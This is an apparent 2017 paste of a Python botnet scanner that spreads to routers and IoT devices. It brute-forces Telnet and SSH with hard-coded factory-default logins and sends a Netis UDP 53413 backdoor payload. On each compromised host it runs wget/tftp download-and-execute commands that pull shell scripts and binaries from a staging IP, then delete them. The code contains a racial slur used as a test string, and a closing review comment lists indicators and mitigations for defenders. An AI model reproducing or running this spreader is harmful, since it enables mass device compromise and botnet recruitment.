
Untitled

a guest
Mar 25th, 2017
  1. @@ -0,0 +1,211 @@
  2. +#!/usr/bin/python
  3. +"""
  4. + GoD-ScaNNeR(NeTiS/TeLNeT/SSH)
  5. + By; LiGhT
  6. +"""
  7. +import threading, sys, time, random, socket, re, os, paramiko
  8. +from Queue import *
  9. +from sys import stdout
  10. +
  11. +if len(sys.argv) < 3:
  12. + print "Usage: python "+sys.argv[0]+" <threads> <list>"
  13. + sys.exit()
  14. +
  15. +# USER AND PASS LISTS #
  16. +usernames = ["root", "admin", "root", "root"] #DONT CHANGE
  17. +passwords = ["oelinux123", "admin", "Zte521", "vizxv"] #DONT CHANGE
  18. +ssh_passwords = ["admin:1234", "root:1234"] #CAN CHANGE
  19. +loginpayload = "AAAAAAAAnetcore\x00" #DONT CHANGE
  20. +
  21. +
  22. +# START CONFIGURATION #
  23. +urlz = "http://185.29.11.197 /tftp" # ARM4 Binary
  24. +sh = "http://185.29.11.197 /bins.sh" # SH File
  25. +command = "AA\x00\x00AAAA cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.29.11.197 /bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 185.29.11.197 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.29.11.197 ; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh\x00" # MIPSEL Binary
  26. +
  27. +# DONT TOUCH
  28. +spawn_shell = "cat | sh"
  29. +paramiko.util.log_to_file("/dev/null") #quiets paramiko output
  30. +threads = int(sys.argv[1])
  31. +ips = open(sys.argv[2], "r").readlines()
  32. +ports = ["23", "22", "53413"]
  33. +queue = Queue()
  34. +qcount = 0
  35. +binary = url.split("/")
  36. +binary = binary[3]
  37. +ip = binary[2]
  38. +found = 0
  39. +count = 0
  40. +
  41. +for ip in ips:
  42. + qcount += 1
  43. + stdout.write("\r[%d] Added to queue" % qcount)
  44. + stdout.flush()
  45. + queue.put(ip)
  46. +print "\n"
  47. +
  48. +def readUntil(tn, string, timeout=10):
  49. + buf = ''
  50. + start_time = time.time()
  51. + while time.time() - start_time < timeout:
  52. + buf += tn.recv(1024)
  53. + time.sleep(0.01)
  54. + if string in buf: return buf
  55. + raise Exception('TIMEOUT!')
  56. +
  57. +def worker():
  58. + try:
  59. + while True:
  60. + try:
  61. + if queue.empty() == True:
  62. + sys.exit(1)
  63. + ip = queue.get()
  64. + ss = sssh(ip)
  65. + ss.start()
  66. + tt = ttelnet(ip)
  67. + tt.start()
  68. + nn = nnetis(ip)
  69. + nn.start()
  70. + queue.task_done()
  71. + except:
  72. + pass
  73. + except:
  74. + pass
  75. +
  76. +class ttelnet(threading.Thread):
  77. + def __init__ (self, ip):
  78. + threading.Thread.__init__(self)
  79. + self.ip = str(ip).rstrip('\n')
  80. + def run(self):
  81. + try:
  82. + tn = socket.socket()
  83. + tn.settimeout(5)
  84. + tn.connect((self.ip,23))
  85. + time.sleep(0.2)
  86. + hoho = ''
  87. + hoho += readUntil(tn, ":")
  88. + if "mdm9625" in hoho:
  89. + r00t = 0
  90. + username = usernames[1]
  91. + password = passwords[1]
  92. + tn.send(username + "\n")
  93. + elif "9615-cdp" in hoho:
  94. + r00t = 1
  95. + username = usernames[0]
  96. + password = passwords[0]
  97. + tn.send(username + "\n")
  98. + elif "ogin" in hoho and "9615-cdp" not in hoho:
  99. + zte = 1
  100. + username = usernames[2]
  101. + password = passwords[2]
  102. + tn.send(username + "\n")
  103. + elif "ogin" in hoho and "mdm9625" not in hoho:
  104. + zte = 1
  105. + username = usernames[2]
  106. + password = passwords[2]
  107. + tn.send(username + "\n")
  108. + if "(none)" in hoho:
  109. + zte = 0
  110. + vizxv = 1
  111. + username = usernames[3]
  112. + password = passwords[3]
  113. + tn.send(username + "\n")
  114. + if "BCM" in hoho:
  115. + zte = 0
  116. + vizxv = 0
  117. + BCM = 1
  118. + username = usernames[1]
  119. + password = passwords[1]
  120. + tn.send(username + "\n")
  121. + except Exception:
  122. + tn.close()
  123. + try:
  124. + hoho = ''
  125. + hoho += readUntil(tn, ":")
  126. + if "assword" in hoho:
  127. + tn.send(password + "\n")
  128. + time.sleep(3)
  129. + except Exception:
  130. + tn.close()
  131. + try:
  132. + mp = ''
  133. + mp += tn.recv(1024)
  134. + if "#" in mp or "$" in mp or "~" in mp or ">" in mp or "root@" in mp: # !DO NOT CHANGE ANYTHING! #
  135. + if r00t: tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  136. + if not r00t: tn.send("su" + "\n"); readUntil(tn, "Password:"); tn.send(passwords[0] + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  137. + if zte: tn.send("cd /var/; rm -rf busybox filename; wget "+url+" -O filename ; cp /bin/busybox ./; busybox cat filename > busybox;./busybox ;rm -rf busybox filename" + "\n"); print "\033[32m[ZTE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  138. + if vizxv: tn.send("cd /var/ || cd /tmp/ || cd /; tftp -r "+binary+" -g "+ip+"; chmod 777 "+binary+"; ./"+binary+"; rm -rf "+binary+""); print "\033[32m[VIZXV] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  139. + if BCM: tn.send(spawn_shell + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*" + "\n"); print "\033[32m[BCM] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  140. + except Exception:
  141. + tn.close()
  142. + pass
  143. +
  144. +class nnetis(threading.Thread):
  145. + def __init__ (self, ip):
  146. + threading.Thread.__init__(self)
  147. + self.ip = str(ip).rstrip('\n')
  148. + def run(self):
  149. + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  150. + try:
  151. + # sends netis payload to almost everything lmao
  152. + s.sendto(loginpayload, (self.ip, 53413))
  153. + time.sleep(1)
  154. + s.sendto(commandpayload, (self.ip, 53413))
  155. + time.sleep(2)
  156. + except Exception:
  157. + pass
  158. +
  159. +class sssh(threading.Thread):
  160. + def __init__ (self, ip):
  161. + threading.Thread.__init__(self)
  162. + self.ip = str(ip).rstrip('\n')
  163. + def run(self):
  164. + x = 1
  165. + while x != 0:
  166. + try:
  167. + username='root'
  168. + password="0"
  169. + port = 22
  170. + ssh = paramiko.SSHClient()
  171. + ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  172. + dobreak=False
  173. + for passwd in ssh_passwords:
  174. + if ":n/a" in passwd:
  175. + password=""
  176. + else:
  177. + password=passwd.split(":")[1]
  178. + if "n/a:" in passwd:
  179. + username=""
  180. + else:
  181. + username=passwd.split(":")[0]
  182. + try:
  183. + ssh.connect(self.ip, port = port, username=username, password=password, timeout=5)
  184. + dobreak=True
  185. + break
  186. + except:
  187. + pass
  188. + if True == dobreak:
  189. + break
  190. + badserver=True
  191. + stdin, stdout, stderr = ssh.exec_command("echo nigger")
  192. + output = stdout.read()
  193. + if "nigger" in output:
  194. + badserver=False
  195. + if badserver == False:
  196. + print "\033[36m[SSH] command sent %s!\033[37m"%(self.ip)
  197. + ssh.exec_command("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*")
  198. + time.sleep(3)
  199. + ssh.close()
  200. + if badserver == True:
  201. + ssh.close()
  202. + except:
  203. + pass
  204. + x = 0
  205. +
  206. +for g in xrange(threads):
  207. + t = threading.Thread(target=worker)
  208. + t.setDaemon(True)
  209. + t.start()
  210. +
  211. +queue.join()
  212. +print "Finished!"
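Review bot: Treat this paste as a malware sample rather than code to run or merge: paste lines 16-19 hard-code factory-default Telnet and SSH logins plus a login payload for UDP port 53413, and lines 25, 135-139 and 197 send a download-and-execute shell command to any host that accepts them. The indicators worth extracting are the staging host 185.29.11.197 (reached over HTTP and TFTP), the dropped names `bins.sh`, `tftp1.sh`, `tftp2.sh`, `phone` and `l.sh`, and the sequence of `wget` or `tftp` into /tmp or /var followed by `chmod 777`, execution and `rm -rf`. These can be matched in egress proxy and netflow logs and in shell or process-execution telemetry on the device types whose login banners are checked at lines 88-114. Exposure is closed by replacing or disabling the default accounts listed at lines 16-18, blocking inbound Telnet (23) and UDP 53413 at the network edge, and limiting SSH (22) to key-based logins from management networks.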